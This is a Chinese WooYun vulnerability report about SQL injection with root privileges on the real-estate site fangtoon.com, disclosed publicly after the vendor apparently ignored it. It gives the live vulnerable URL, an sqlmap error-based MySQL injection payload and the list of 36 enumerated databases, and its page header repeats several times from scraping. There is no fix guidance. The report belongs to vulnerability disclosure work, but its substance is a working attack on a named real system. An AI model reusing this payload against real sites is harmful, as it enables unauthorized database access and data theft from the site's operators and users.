房通网sql注入漏洞(root权限) | wooyun-2015-0156371| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0156371

漏洞标题：房通网sql注入漏洞(root权限)

漏洞作者：路人甲

提交时间：2015-11-27 18:22

修复时间：2016-01-11 18:24

公开时间：2016-01-11 18:24

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：未联系到厂商或者厂商积极忽略

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-11-27：积极联系厂商并且等待厂商认领中，细节不对外公开
2016-01-11：厂商已经主动忽略漏洞，细节向公众公开

简要描述：

房通网存在sql注入漏洞(root权限) 未深入

详细说明：

房通网存在sql注入漏洞:
http://wh.xf.fangtoon.com/index.php?r=XfActive/Detail&id=2%27%20and%201=1

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: r=XfActive/Detail&id=2 AND (SELECT 4495 FROM(SELECT COUNT(*),CONCAT(CHAR(58,97,122,109,58),(SELECT (CASE WHEN (4495=4495) THEN 1 ELSE 0 END)),CHAR(58,106,98,122,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
---
available databases [36]:
[*] dd
[*] dedenews
[*] fangtoon2
[*] fangtoon_bj
[*] fangtoon_cd
[*] fangtoon_cq
[*] fangtoon_cs
[*] fangtoon_dc
[*] fangtoon_dl
[*] fangtoon_fur
[*] fangtoon_hf
[*] fangtoon_hz
[*] fangtoon_jn
[*] fangtoon_job
[*] fangtoon_nj
[*] fangtoon_qd
[*] fangtoon_sh
[*] fangtoon_suz
[*] fangtoon_sy
[*] fangtoon_sz
[*] fangtoon_tj
[*] fangtoon_ty
[*] fangtoon_wh
[*] fangtoon_wux
[*] fangtoon_wx
[*] fangtoon_xa
[*] fangtoon_yc
[*] fangtoon_yt
[*] ftw_toon
[*] information_schema
[*] mysql
[*] performance_schema
[*] publish
[*] syswin_400
[*] test
[*] weix

漏洞证明：

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: http://wh.xf.fangtoon.com/index.php?r=XfActive/Detail&id=2 AND (SELECT 4495 FROM(SELECT COUNT(*),CONCAT(CHAR(58,97,122,109,58),(SELECT (CASE WHEN (4495=4495) THEN 1 ELSE 0 END)),CHAR(58,106,98,122,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
---

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0156371

漏洞标题：房通网sql注入漏洞(root权限)

相关厂商：北京房通网科技有限公司

漏洞作者：路人甲

提交时间：2015-11-27 18:22

修复时间：2016-01-11 18:24

公开时间：2016-01-11 18:24

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：未联系到厂商或者厂商积极忽略

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0156371

漏洞标题：房通网sql注入漏洞(root权限)

相关厂商：北京房通网科技有限公司

漏洞作者： 路人甲

提交时间：2015-11-27 18:22

修复时间：2016-01-11 18:24

公开时间：2016-01-11 18:24

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：未联系到厂商或者厂商积极忽略

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0156371"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：路人甲

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源路人甲@乌云